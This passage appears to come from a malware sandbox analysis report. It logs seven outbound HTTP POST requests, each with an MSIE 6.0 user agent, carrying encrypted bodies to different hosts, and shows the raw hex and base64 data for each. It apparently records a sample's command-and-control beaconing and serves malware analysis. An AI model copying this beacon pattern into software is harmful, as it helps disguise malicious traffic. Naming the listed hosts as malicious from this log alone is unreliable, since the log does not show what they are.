4c 37 6d 32 34 6a 39 42 31 33 52 54 69 4b 31 59 63 56 49 4d 65 65 62 77 69 37 55 73 70 44 6f 34 4c 64 54 35 4b 2b 6b 74 50 36 35 49 56 59 68 45 63 55 65 4d 43 52 52 63 6f 7a 75 79 34 6f 63 6a 61 34 44 6a 42 2f 7a 56 46 33 4d 59 34 72 57 65 52 53 44 57 53 54 6d 4c 2f 51 2b 52 48 48 4f 65 2b 45 51 63 32 5a 79 66 2f 58 54 4d 48 68 30 73 4a 68 6c 68 51 75 31 72 47 32 67 4a 64 4d 6f 46 54 64 42 73 33 70 47 65 70 72 6a 6e 64 79 31 74 70 43 71 73 30 74 6c 68 41 74 59 59 51 2b 71 44 4a 6e 35 61 42 6c 35 73 56 71 72 71 32 6c 47 6d 34 4b 39 65 44 4a 63 44 66 38 66 63 54 42 41 6f 31 55 78 34 69 5a 4d 55 6a 6a 45 50 30 4a 43 59 58 58 34 4d 38 48 52 70 39 4e 77 42 4d 55 2f 64 6a 68 44 45 46 49 4c 6a 48 71 61 7a 66 63 6f 44 48 63 76 66 68 4f 51 3d Data Ascii: bcuZXyOxsZvUu2hVquRzPUyv7s9JBh/RB5kAJsgG2aPLACywRublTlQHZz3PztSXRjPLs+b4uQjo1+txQjCznbAGS4LUcYrjXw3Ow3P+mjtswvSHOLxkLjRI4gI+11QXf6Te/yOEoVCooOB3Vlwiy4j9FwGiGKXUd4tUu3MHBwC40DCVRC5QcCZCPgZ3xnCdrtmL75nrocw/7aIpBezy0QRSaveVLZKAuHNg4vjoK40mSri+uIdvL+JlT//lbsACx+P8lL7O9A4QLmnzXxJ713MrqvzPmycaK6WrTJY09t42/Do/bBaFigGyI1qXL7m24j9B13RTiK1YcVIMeebwi7UspDo4LdT5K+ktP65IVYhEcUeMCRRcozuy4ocja4DjB/zVF3MY4rWeRSDWSTmL/Q+RHHOe+EQc2Zyf/XTMHh0sJhlhQu1rG2gJdMoFTdBs3pGeprjndy1tpCqs0tlhAtYYQ+qDJn5aBl5sVqrq2lGm4K9eDJcDf8fcTBAo1Ux4iZMUjjEP0JCYXX4M8HRp9NwBMU/djhDEFILjHqazfcoDHcvfhOQ=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abdg.comCache-Control: no-cacheData Raw: 69 2b 54 32 70 79 43 73 4d 6d 4e 36 66 43 73 33 63 33 43 32 52 56 4e 49 6e 34 43 49 44 53 52 2b 56 42 55 64 44 2b 74 4f 42 2f 68 6f 53 31 72 76 62 55 47 76 61 4f 5a 6a 41 6b 44 54 6a 63 78 64 4a 37 48 67 55 39 37 30 4c 35 75 4c 31 39 48 71 79 56 70 66 6f 46 55 67 69 42 44 39 75 51 4c 4a 37 4f 33 56 58 35 56 45 49 7a 6d 41 67 6a 54 39 75 71 6b 36 79 70 57 69 62 48 2b 54 44 56 54 74 74 34 4d 43 71 56 45 44 55 67 52 56 33 54 43 5a 4a 2b 71 56 4d 47 6a 62 58 52 71 50 67 51 62 57 75 37 70 39 59 77 72 4a 78 45 46 5a 41 33 33 4d 30 6d 6d 79 4b 6e 6c 43 39 53 4c 49 52 41 68 4d 41 34 4f 6e 59 78 41 43 63 4b 53 63 50 43 59 68 6b 6f 52 35 50 49 74 6c 74 32 68 77 75 47 2b 6d 79 49 57 2f 2f 62 49 36 63 61 62 4f 38 32 50 32 30 6a 33 41 4c 2f 4d 2f 65 67 58 6e 45 2f 47 49 66 42 71 41 77 56 49 39 69 73 45 68 54 56 41 70 73 54 72 2f 37 36 2f 42 57 42 69 34 71 41 74 6d 63 43 6f 68 4b 36 59 6d 4a 44 34 48 69 76 52 65 64 6d 5a 7a 46 47 38 56 31 6a 72 4b 47 56 6f 56 51 30 78 6a 6d 67 6d 30 66 4e 34 4c 65 6f 6a 44 70 6f 43 77 33 36 6f 30 73 45 6d 6d 49 4b 51 41 54 56 36 47 2b 69 46 50 4d 78 78 4a 6d 69 2b 65 6b 77 48 63 62 4c 2f 39 33 41 30 7a 56 54 56 43 6f 49 6b 71 79 64 49 62 76 58 4d 4c 66 4f 43 50 66 76 77 6e 6a 6a 45 75 71 54 49 6a 70 53 47 58 32 6b 62 35 59 7a 37 67 33 49 69 45 73 57 69 78 4a 32 46 42 39 73 58 4b 2b 6c 6b 67 4a 5a 54 6b 62 72 51 45 6e 36 44 64 78 58 39 4f 49 44 51 49 70 4d 39 33 61 36 55 2b 6b 31 54 58 66 48 31 33 51 77 35 38 34 39 57 58 6d 55 69 33 45 6e 68 6b 61 48 74 74 54 37 48 6b 50 4e 46 42 41 6a 51 74 78 33 45 35 39 6f 4a 6c 79 73 4e 52 55 79 42 5a 57 46 6f 69 62 76 79 66 30 47 79 76 6e 50 66 6d 50 70 33 52 6c 36 74 70 4f 78 49 48 49 73 74 71 4b 56 55 32 6d 66 6e 6a 54 67 3d 3d Data Ascii: i+T2pyCsMmN6fCs3c3C2RVNIn4CIDSR+VBUdD+tOB/hoS1rvbUGvaOZjAkDTjcxdJ7HgU970L5uL19HqyVpfoFUgiBD9uQLJ7O3VX5VEIzmAgjT9uqk6ypWibH+TDVTtt4MCqVEDUgRV3TCZJ+qVMGjbXRqPgQbWu7p9YwrJxEFZA33M0mmyKnlC9SLIRAhMA4OnYxACcKScPCYhkoR5PItlt2hwuG+myIW//bI6cabO82P20j3AL/M/egXnE/GIfBqAwVI9isEhTVApsTr/76/BWBi4qAtmcCohK6YmJD4HivRedmZzFG8V1jrKGVoVQ0xjmgm0fN4LeojDpoCw36o0sEmmIKQATV6G+iFPMxxJmi+ekwHcbL/93A0zVTVCoIkqydIbvXMLfOCPfvwnjjEuqTIjpSGX2kb5Yz7g3IiEsWixJ2FB9sXK+lkgJZTkbrQEn6DdxX9OIDQIpM93a6U+k1TXfH13Qw5849WXmUi3EnhkaHttT7HkPNFBAjQtx3E59oJlysNRUyBZWFoibvyf0GyvnPfmPp3Rl6tpOxIHIstqKVU2mfnjTg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 33 6d 6e 45 6d 77 46 57 47 57 4f 6d 78 68 45 44 34 4c 63 56 77 39 70 4a 4b 72 56 2f 5a 7a 47 79 78 56 52 6d 57 42 6a 52 4f 59 51 4d 48 71 74 43 42 70 75 70 62 2b 51 58 4e 57 74 68 66 4c 67 48 4d 44 58 33 68 44 4f 4c 6d 6e 67 78 6d 47 53 31 4d 47 7a 30 34 53 43 76 55 52 51 6f 7a 42 44 7a 56 57 6e 4e 76 54 66 62 56 57 69 76 78 76 49 5a 33 79 38 4a 68 55 77 36 61 4f 33 65 4a 50 47 6f 32 34 4d 48 74 58 48 65 69 6f 57 54 7a 38 73 37 57 34 50 73 47 48 39 48 51 63 6d 4a 75 33 6b 6e 69 64 42 63 57 51 67 75 35 4e 4f 6a 74 76 4b 78 4e 75 57 34 6e 67 49 59 71 73 30 39 68 79 67 48 52 66 76 30 32 52 35 42 50 7a 72 62 54 4d 63 53 48 72 58 52 61 6c 59 37 55 73 52 68 76 52 67 79 76 6d 6c 59 58 6e 68 37 44 77 4d 6c 46 6b 64 35 64 55 46 2b 6f 6a 53 2f 64 57 4e 56 78 70 30 6a 55 56 6c 79 57 47 54 2f 7a 4e 4a 4e 41 50 57 33 35 30 54 63 49 4d 64 6b 31 38 2f 45 70 4d 4f 30 47 61 45 6b 69 4c 43 57 6b 56 6e 4f 78 46 4f 71 43 68 76 71 4d 63 47 44 78 4a 47 63 7a 71 2f 78 6e 77 4f 78 73 35 41 33 6e 59 68 57 31 72 78 39 51 55 4e 37 38 34 50 5a 6f 42 68 75 49 5a 36 63 77 78 62 62 69 32 54 76 74 4d 2f 41 33 69 68 79 43 66 68 71 79 72 6a 4c 6c 6a 51 6d 54 77 7a 6a 56 52 58 71 52 38 47 6e 48 5a 44 41 78 42 43 4f 46 46 38 35 78 77 41 37 67 64 75 4a 51 5a 4b 43 67 56 69 6c 71 41 74 41 75 32 45 78 79 52 2b 72 38 52 68 58 37 58 2b 64 57 55 71 51 51 4e 56 6a 46 4c 56 74 6a 31 56 74 69 52 49 62 52 38 30 6c 4b 44 47 77 52 33 4a 6a 39 6d 36 35 42 5a 48 44 38 4d 6c 68 70 6a 4a 6d 76 70 70 6f 31 33 44 51 74 4c 53 4e 35 59 2f 4c 55 44 54 6f 68 73 2f 72 33 4c 6d 39 54 7a 6f 6e 5a 32 6b 6d 53 2f 69 4b 6d 56 48 53 70 37 4e 2f 53 78 73 50 35 61 4d 35 62 2f 2f 39 73 4c 35 61 33 51 3d 3d Data Ascii: 3mnEmwFWGWOmxhED4LcVw9pJKrV/ZzGyxVRmWBjROYQMHqtCBpupb+QXNWthfLgHMDX3hDOLmngxmGS1MGz04SCvURQozBDzVWnNvTfbVWivxvIZ3y8JhUw6aO3eJPGo24MHtXHeioWTz8s7W4PsGH9HQcmJu3knidBcWQgu5NOjtvKxNuW4ngIYqs09hygHRfv02R5BPzrbTMcSHrXRalY7UsRhvRgyvmlYXnh7DwMlFkd5dUF+ojS/dWNVxp0jUVlyWGT/zNJNAPW350TcIMdk18/EpMO0GaEkiLCWkVnOxFOqChvqMcGDxJGczq/xnwOxs5A3nYhW1rx9QUN784PZoBhuIZ6cwxbbi2TvtM/A3ihyCfhqyrjLljQmTwzjVRXqR8GnHZDAxBCOFF85xwA7gduJQZKCgVilqAtAu2ExyR+r8RhX7X+dWUqQQNVjFLVtj1VtiRIbR80lKDGwR3Jj9m65BZHD8MlhpjJmvppo13DQtLSN5Y/LUDTohs/r3Lm9TzonZ2kmS/iKmVHSp7N/SxsP5aM5b//9sL5a3Q==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 32 73 34 70 67 2f 45 70 4b 57 4d 2b 79 68 66 6a 45 42 72 46 78 45 70 33 52 31 77 76 6f 68 37 5a 74 53 38 4c 52 67 6e 73 7a 71 5a 71 38 72 70 46 70 7a 52 70 70 6a 30 4d 33 36 78 5a 75 56 50 4f 44 7a 4e 70 34 65 4b 2f 42 4d 37 46 56 35 45 79 6b 76 50 49 37 53 53 43 57 6d 32 43 42 48 4f 6a 69 32 32 63 32 4a 51 77 35 42 74 63 46 67 65 38 42 4d 55 55 4b 62 6d 4c 64 53 70 4b 32 6b 33 4d 2b 41 38 58 33 70 77 6f 72 47 68 50 33 66 75 4b 50 45 64 42 79 69 62 65 4f 2b 74 4e 67 36 67 2b 6d 71 63 39 67 38 78 32 75 6b 72 52 78 4c 36 31 51 4c 69 75 30 4a 6c 39 2f 74 6b 78 48 49 4f 65 5a 75 50 77 77 47 33 61 7a 35 49 50 30 65 59 35 61 48 6f 50 4d 74 65 4a 69 4a 6f 67 75 4c 70 44 79 65 50 4d 79 36 66 63 50 4f 2f 35 76 78 6d 6b 76 55 6a 4a 32 71 70 7a 42 44 74 56 71 53 7a 36 2f 71 58 72 2b 32 34 4a 2f 38 36 73 6e 2f 4a 49 70 6f 78 46 34 4e 53 36 6f 4a 76 51 7a 5a 69 51 76 53 67 76 33 66 36 49 74 79 54 45 64 6c 75 32 48 7a 7a 6e 59 33 72 35 37 67 32 62 58 6a 4c 2f 55 59 4f 68 71 4c 62 7a 6e 56 73 4c 61 53 49 74 59 76 56 39 74 72 42 42 51 2b 43 4d 62 39 79 4d 2f 41 52 63 72 36 76 55 6d 65 37 71 46 34 77 7a 6d 35 44 6b 56 68 67 74 69 75 76 54 6b 4e 6f 48 6d 73 57 58 5a 5a 72 33 38 64 47 33 54 42 49 2b 31 4f 4e 37 48 4b 77 7a 42 32 73 30 78 6a 7a 57 32 69 62 64 38 41 61 66 55 74 64 2f 70 4f 7a 79 70 6e 4a 54 63 7a 68 76 48 48 6a 33 4a 61 63 62 70 4b 53 63 73 77 77 5a 74 50 65 38 74 70 2b 49 75 69 70 55 2f 4d 33 55 62 62 38 66 5a 4c 48 48 48 4a 74 30 5a 4a 6e 6a 39 79 4c 2f 4a 6b 4c 63 2b 72 2b 75 45 44 45 75 36 6c 30 43 42 46 37 74 5a 50 61 2f 4d 5a 4e 34 70 69 59 55 4e 52 5a 42 33 71 48 4d 4b 69 68 30 39 75 39 37 65 51 3d 3d Data Ascii: 2s4pg/EpKWM+yhfjEBrFxEp3R1wvoh7ZtS8LRgnszqZq8rpFpzRppj0M36xZuVPODzNp4eK/BM7FV5EykvPI7SSCWm2CBHOji22c2JQw5BtcFge8BMUUKbmLdSpK2k3M+A8X3pworGhP3fuKPEdByibeO+tNg6g+mqc9g8x2ukrRxL61QLiu0Jl9/tkxHIOeZuPwwG3az5IP0eY5aHoPMteJiJoguLpDyePMy6fcPO/5vxmkvUjJ2qpzBDtVqSz6/qXr+24J/86sn/JIpoxF4NS6oJvQzZiQvSgv3f6ItyTEdlu2HzznY3r57g2bXjL/UYOhqLbznVsLaSItYvV9trBBQ+CMb9yM/ARcr6vUme7qF4wzm5DkVhgtiuvTkNoHmsWXZZr38dG3TBI+1ON7HKwzB2s0xjzW2ibd8AafUtd/pOzypnJTczhvHHj3JacbpKScswwZtPe8tp+IuipU/M3Ubb8fZLHHHJt0ZJnj9yL/JkLc+r+uEDEu6l0CBF7tZPa/MZN4piYUNRZB3qHMKih09u97eQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valselit.comCache-Control: no-cacheData Raw: 4e 67 43 33 74 70 37 56 76 4a 76 62 50 68 48 38 36 63 43 51 50 6f 48 30 54 65 44 65 48 78 76 44 73 6b 64 64 79 37 71 6c 38 77 64 6f 47 2f 6b 30 6d 6d 57 50 79 2b 59 43 55 42 6c 5a 53 38 77 42 6d 58 69 52 4e 33 41 4f 57 50 77 4e 36 72 58 4d 43 68 35 75 77 6c 4a 56 2b 41 2f 6a 65 71 71 74 37 6f 39 6a 62 31 75 4f 51 44 34 4a 6a 39 46 32 4c 50 35 67 4c 4f 52 7a 36 78 39 72 2f 69 56 2b 63 53 64 42 39 48 64 7a 6b 70 53 32 6a 52 35 78 62 74 7a 37 70 63 2b 66 5a 33 76 49 57 39 63 42 44 79 76 38 39 59 49 50 78 6a 78 34 5a 59 4b 77 62 37 6e 76 76 34 6c 59 6e 4d 78 67 73 54 4a 56 2f 65 64 68 6d 78 58 6d 50 4e 54 46 50 6d 49 69 48 34 6f 74 2f 38 6e 58 4e 47 58 64 42 67 52 69 7a 57 6d 74 45 33 50 6b 68 33 36 63 52 51 4e 4e 6b 58 2f 38 77 79 64 4d 68 4a 4d 71 37 74 47 78 52 42 41 46 2f 46 37 68 4a 54 51 45 68 49 79 34 64 77 34 30 45 51 65 53 2f 6c 53 4a 6b 4d 51 4e 69 46 68 58 44 2f 58 36 73 70 77 56 6c 30 57 5a 2b 39 78 47 49 58 4e 38 7a 4d 79 4e 72 6c 6e 56 59 51 6d 7a 2b 30 56 6b 50 37 63 75 73 4a 34 62 72 51 38 50 56 77 56 4a 49 2b 7a 6a 5a 75 6a 48 37 63 67 47 4a 74 6f 49 31 52 32 49 72 6f 58 73 56 68 56 52 58 75 43 2f 66 79 6d 30 32 47 71 39 56 67 76 64 4f 78 32 4e 39 2f 2f 41 5a 38 2f 76 53 47 30 63 79 57 6c 31 62 36 4c 43 63 64 35 57 55 74 69 49 50 61 79 5a 71 50 73 4b 71 5a 78 56 69 63 7a 6c 6d 52 52 33 2f 39 32 45 38 6f 47 34 76 4b 57 56 45 2b 57 67 46 44 54 4e 6f 56 74 72 53 4c 52 77 52 77 56 35 38 76 44 78 31 5a 57 62 71 79 6f 55 37 35 6b 58 4d 76 6d 44 72 66 66 32 4d 6a 70 7a 52 56 53 77 52 6d 49 38 2b 4a 45 63 57 70 74 55 2b 68 49 74 4b 51 55 41 48 55 55 69 6e 75 64 59 58 50 50 36 38 70 62 52 56 30 32 2f 7a 44 65 58 4e 6e 49 6e 6e 73 50 4f 5a 4d 63 44 55 4b 55 62 48 72 4a 7a 65 61 75 4f 35 5a 6b 54 38 77 3d 3d Data Ascii: NgC3tp7VvJvbPhH86cCQPoH0TeDeHxvDskddy7ql8wdoG/k0mmWPy+YCUBlZS8wBmXiRN3AOWPwN6rXMCh5uwlJV+A/jeqqt7o9jb1uOQD4Jj9F2LP5gLORz6x9r/iV+cSdB9HdzkpS2jR5xbtz7pc+fZ3vIW9cBDyv89YIPxjx4ZYKwb7nvv4lYnMxgsTJV/edhmxXmPNTFPmIiH4ot/8nXNGXdBgRizWmtE3Pkh36cRQNNkX/8wydMhJMq7tGxRBAF/F7hJTQEhIy4dw40EQeS/lSJkMQNiFhXD/X6spwVl0WZ+9xGIXN8zMyNrlnVYQmz+0VkP7cusJ4brQ8PVwVJI+zjZujH7cgGJtoI1R2IroXsVhVRXuC/fym02Gq9VgvdOx2N9//AZ8/vSG0cyWl1b6LCcd5WUtiIPayZqPsKqZxViczlmRR3/92E8oG4vKWVE+WgFDTNoVtrSLRwRwV58vDx1ZWbqyoU75kXMvmDrff2MjpzRVSwRmI8+JEcWptU+hItKQUAHUUinudYXPP68pbRV02/zDeXNnInnsPOZMcDUKUbHrJzeauO5ZkT8w==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 62 63 75 5a 58 79 4f 78 73 5a 76 55 75 32 68 56 71 75 52 7a 50 55 79 76 37 73 39 4a 42 68 2f 52 42 35 6b 41 4a 73 67 47 32 61 50 4c 41 43 79 77 52 75 62 6c 54 6c 51 48 5a 7a 33 50 7a 74 53 58 52 6a 50 4c 73 2b 62 34 75 51 6a 6f 31 2b 74 78 51 6a 43 7a 6e 62 41 47 53 34 4c 55 63 59 72 6a 58 77 33 4f 77 33 50 2b 6d 6a 74 73 77 76 53 48 4f 4c 78 6b 4c 6a 52 49 34 67 49 2b 31 31 51 58 66 36 54 65 2f 79 4f 45 6f 56 43 6f 6f 4f 42 33 56 6c 77 69 79 34 6a 39 46 77 47 69 47 4b 58 55 64 34 74 55 75 33 4d 48 42 77 43 34 30 44 43 56 52 43 35 51 63 43 5a 43 50 67 5a 33 78 6e 43 64 72 74 6d 4c 37 35 6e 72 6f 63 77 2f 37 61 49 70 42 65 7a 79 30 51 52 53 61 76 65 56 4c 5a 4b 41 75 48 4e 67 34 76 6a 6f 4b 34 30 6d 53 72 69 2b 75 49 64 76 4c 2b 4a 6c 54 2f 2f 6c 62 73 41 43 78 2b 50 38 6c 4c 37 4f 39 41 34 51 4c 6d 6e 7a 58 78 4a 37 31 33 4d 72 71 76 7a 50 6d 79 63 61 4b 36 57 72 54 4a 59 30 39 74 34 32 2f 44 6f 2f 62 42 61 46 69 67 47 79 49 31 71 58 4c 37 6d 32 34 6a 39 42 31 33 52 54 69 4b 31 59 63 56 49 4d 65 65 62 77 69 37 55 73 70 44 6f 34 4c 64 54 35 4b 2b 6b 74 50 36 35 49 56 59 68 45 63 55 65 4d 43 52 52 63 6f 7a 75 79 34 6f 63 6a 61 34 44 6a 42 2f 7a 56 46 33 4d 59 34 72 57 65 52 53 44 57 53 54 6d 4c 2f 51 2b 52 48 48 4f 65 2b 45 51 63 32 5a 79 66 2f 58 54 4d 48 68 30 73 4a 68 6c 68 51 75 31 72 47 32 67 4a 64 4d 6f 46 54 64 42 73 33 70 47 65 70 72 6a 6e 64 79 31 74 70 43 71 73 30 74 6c 68 41 74 59 59 51 2b 71 44 4a 6e 35 61 42 6c 35 73 56 71 72 71 32 6c 47 6d 34 4b 39 65 44 4a 63 44 66 38 66 63 54 42 41 6f 31 55 78 34 69 5a 4d 55 6a 6a 45 50 30 4a 43 59 58 58 34 4d 38 48 52 70 39 4e 77 42 4d 55 2f 64 6a 68 44 45 46 49 4c 6a 48 71 61 7a 66 63 6f 44 48 63 76 66 68 4f 51 3d Data Ascii: bcuZXyOxsZvUu2hVquRzPUyv7s9JBh/RB5kAJsgG2aPLACywRublTlQHZz3PztSXRjPLs+b4uQjo1+txQjCznbAGS4LUcYrjXw3Ow3P+mjtswvSHOLxkLjRI4gI+11QXf6Te/yOEoVCooOB3Vlwiy4j9FwGiGKXUd4tUu3MHBwC40DCVRC5QcCZCPgZ3xnCdrtmL75nrocw/7aIpBezy0QRSaveVLZKAuHNg4vjoK40mSri+uIdvL+JlT//lbsACx+P8lL7O9A4QLmnzXxJ713MrqvzPmycaK6WrTJY09t42/Do/bBaFigGyI1qXL7m24j9B13RTiK1YcVIMeebwi7UspDo4LdT5K+ktP65IVYhEcUeMCRRcozuy4ocja4DjB/zVF3MY4rWeRSDWSTmL/Q+RHHOe+EQc2Zyf/XTMHh0sJhlhQu1rG2gJdMoFTdBs3pGeprjndy1tpCqs0tlhAtYYQ+qDJn5aBl5sVqrq2lGm4K9eDJcDf8fcTBAo1Ux4iZMUjjEP0JCYXX4M8HRp9NwBMU/djhDEFILjHqazfcoDHcvfhOQ=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.2print.comCache-Control: no-cacheData Raw: 32 77 30 33 57 32 4a 39 79 70 74 76 61 2b 46 76 31 56 30 2b 45 75 55 6b 66 43 44 79 72 48 38 6d 74 6d 45 66 56 62 2f 46 4b 52 70 50 54 31 2f 31 32 39 72 4f 46 70 77 75 62 76 55 52 32 6b 46 34 74 61 45 48 6e 68 39 68 57 69 72 54 74 42 30 72 38 61 58 56 4b 65 49 36 4f 4d 4a 6d 6c 48 33 4c 74 45 73 6d 72 7a 39 79 59 39 57 4a 51 5a 75 47 6e 48 31 70 4d 67 6f 4c 35 76 41 2b 35 45 4c 74 73 63 6a 6f 66 4c 7a 31 6b 75 6a 6d 46 53 6f 6c 6d 46 58 2b 53 57 34 6e 58 71 7a 35 41 78 74 74 72 56 56 42 37 54 6e 6a 6d 74 64 6a 39 79 34 58 4a 53 46 66 73 69 37 38 47 4f 37 46 65 42 31 45 63 44 57 2b 49 64 57 32 68 57 54 6e 45 66 49 49 77 52 78 63 4f 34 4a 69 68 52 48 69 2f 39 61 2f 45 6c 57 34 4a 52 30 6a 69 52 68 66 45 61 79 43 69 76 61 49 4c 36 74 61 64 5a 4b 31 43 75 46 6b 78 55 32 44 57 6a 4c 59 45 62 73 43 42 34 79 2b 48 5a 6a 73 59 36 7a 47 4a 6a 6a 34 68 6b 53 4d 53 34 38 6e 61 4d 6e 33 77 44 4c 78 4d 74 32 45 58 78 38 53 72 58 38 79 56 54 6a 2b 6a 6f 46 79 46 63 4e 77 56 6b 64 4d 65 6b 70 79 58 71 59 53 78 44 72 6b 6c 62 38 52 51 72 65 51 48 43 6a 4e 4d 72 33 58 41 65 75 58 43 4d 4b 54 56 68 4b 45 39 37 6c 4a 32 6e 6e 45 77 70 63 67 7a 6e 4c 70 34 71 64 41 34 76 37 64 75 6c 49 6b 41 53 64 6f 37 75 32 6b 53 56 36 52 6a 54 42 6e 6a 72 79 34 62 6e 45 59 4b 74 36 2b 67 6a 7a 48 33 63 51 36 52 4d 2b 6b 61 4f 39 48 30 55 6f 76 78 4d 77 79 49 30 4f 56 71 48 54 68 66 67 44 31 6b 76 5a 47 79 74 34 45 77 36 4b 63 5a 31 45 39 75 71 38 58 2f 77 5a 49 34 71 35 41 43 6e 47 44 77 41 64 61 63 73 55 4a 41 78 39 4b 36 68 32 48 70 32 5a 70 63 79 64 4e 69 73 61 66 72 57 54 4a 66 6b 38 33 4d 53 6a 4a 37 64 30 77 52 54 6c 4e 6b 57 50 4c 63 44 4f 43 50 49 4e 32 4e 5a 47 63 51 7a 49 3d Data Ascii: 2w03W2J9yptva+Fv1V0+EuUkfCDyrH8mtmEfVb/FKRpPT1/129rOFpwubvUR2kF4taEHnh9hWirTtB0r8aXVKeI6OMJmlH3LtEsmrz9yY9WJQZuGnH1pMgoL5vA+5ELtscjofLz1kujmFSolmFX+SW4nXqz5AxttrVVB7Tnjmtdj9y4XJSFfsi78GO7FeB1EcDW+IdW2hWTnEfIIwRxcO4JihRHi/9a/ElW4JR0jiRhfEayCivaIL6tadZK1CuFkxU2DWjLYEbsCB4y+HZjsY6zGJjj4hkSMS48naMn3wDLxMt2EXx8SrX8yVTj+joFyFcNwVkdMekpyXqYSxDrklb8RQreQHCjNMr3XAeuXCMKTVhKE97lJ2nnEwpcgznLp4qdA4v7dulIkASdo7u2kSV6RjTBnjry4bnEYKt6+gjzH3cQ6RM+kaO9H0UovxMwyI0OVqHThfgD1kvZGyt4Ew6KcZ1E9uq8X/wZI4q5ACnGDwAdacsUJAx9K6h2Hp2ZpcydNisafrWTJfk83MSjJ7d0wRTlNkWPLcDOCPIN2NZGcQzI=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wifi4all.nlCache-Control: no-cacheData Raw: 51 4a 78 64 6a 37 45 67 55 32 50 71 42 46 66 53 30 43 4c 33 6c 77 70 59 71 4d 62 76 6a 2b 34 78 64 53 6f 33 6e 4e 50 4a 52 41 79 49 56 4c 76 61 4f 58 4a 71 70 32 5a 76 59 62 52 42 62 53 4d 57 42 49 79 6c 6e 64 2b 42 58 2f 68 32 2f 35 62 6c 4e 72 62 68 58 77 35 4d 31 41 35 55 67 43 67 31 4b 37 51 62 47 4f 59 47 77 46 6c 54 4f 69 70 44 71 73 57 46 74 6e 64 76 6c 6d 52 65 6e 2f 35 63 7a 70 37 66 2b 4e 65 61 55 67 73 78 45 75 32 53 64 55 73 34 45 54 35 48 6c 4a 39 52 6b 61 2f 51 54 39 4f 77 34 44 6e 51 68 54 30 4b 63 54 4e 61 63 6c 56 49 4d 2b 66 71 77 34 6e 68 78 79 52 33 61 6c 43 59 53 4f 76 55 57 31 32 64 45 33 53 54 2f 43 51 64 4b 43 2b 69 69 72 5a 6f 38 4a 55 5a 44 63 74 42 6f 64 43 79 42 4c 67 51 64 34 5a 4b 77 79 49 77 38 39 4d 31 70 66 41 79 4d 68 62 61 75 58 32 71 79 5a 30 68 4a 64 68 30 65 71 34 61 2f 47 4b 67 69 41 76 6c 74 49 50 56 63 71 58 55 7a 45 44 41 56 32 41 4a 64 4d 2b 64 50 6c 37 36 61 63 2f 2f 51 35 72 41 47 53 62 57 6c 58 55 69 48 48 6e 47 46 69 45 66 4a 68 62 39 6c 33 62 61 34 35 45 75 53 55 56 4d 32 4b 74 64 49 39 6d 6e 4f 61 63 36 66 4a 44 51 58 4e 65 47 54 58 58 5a 33 61 44 4d 67 32 55 31 2f 59 71 74 2f 75 7a 78 7a 5a 51 35 72 65 6f 58 6b 78 6f 52 52 58 33 57 72 34 75 43 4e 36 4c 72 39 7a 58 34 71 70 37 34 62 56 7a 4f 77 36 79 61 7a 44 36 4c 35 66 6d 77 4a 59 32 67 35 4b 68 2f 6e 71 6d 72 52 53 58 6c 53 33 72 64 62 58 66 79 2f 4f 45 39 36 77 33 42 58 2b 42 33 65 79 32 75 72 43 52 31 55 6c 75 57 75 2f 38 47 62 35 69 6b 79 34 68 35 6d 30 2f 6e 79 31 35 64 32 36 65 38 74 39 46 6b 34 7a 42 63 43 52 52 61 46 37 65 69 65 68 73 4a 44 58 7a 44 35 32 7a 48 30 7a 38 65 4c 37 36 5a 77 6e 4c 61 61 4e 30 32 70 6c 48 72 48 6a 69 33 6f 66 74 77 33 4b 51 68 6e 76 75 53 54 79 7a 39 72 6b 59 64 42 2b 4e 30 75 46 35 69 34 46 64 77 55 6b 42 2b 55 51 3d 3d Data Ascii: QJxdj7EgU2PqBFfS0CL3lwpYqMbvj+4xdSo3nNPJRAyIVLvaOXJqp2ZvYbRBbSMWBIylnd+BX/h2/5blNrbhXw5M1A5UgCg1K7QbGOYGwFlTOipDqsWFtndvlmRen/5czp7f+NeaUgsxEu2SdUs4ET5HlJ9Rka/QT9Ow4DnQhT0KcTNaclVIM+fqw4nhxyR3alCYSOvUW12dE3ST/CQdKC+iirZo8JUZDctBodCyBLgQd4ZKwyIw89M1pfAyMhbauX2qyZ0hJdh0eq4a/GKgiAvltIPVcqXUzEDAV2AJdM+dPl76ac//Q5rAGSbWlXUiHHnGFiEfJhb9l3ba45EuSUVM2KtdI9mnOac6fJDQXNeGTXXZ3aDMg2U1/Yqt/uzxzZQ5reoXkxoRRX3Wr4uCN6Lr9zX4qp74bVzOw6yazD6L5fmwJY2g5Kh/nqmrRSXlS3rdbXfy/OE96w3BX+B3ey2urCR1UluWu/8Gb5iky4h5m0/ny15d26e8t9Fk4zBcCRRaF7eiehsJDXzD52zH0z8eL76ZwnLaaN02plHrHji3oftw3KQhnvuSTyz9rkYdB+N0uF5i4FdwUkB+UQ==
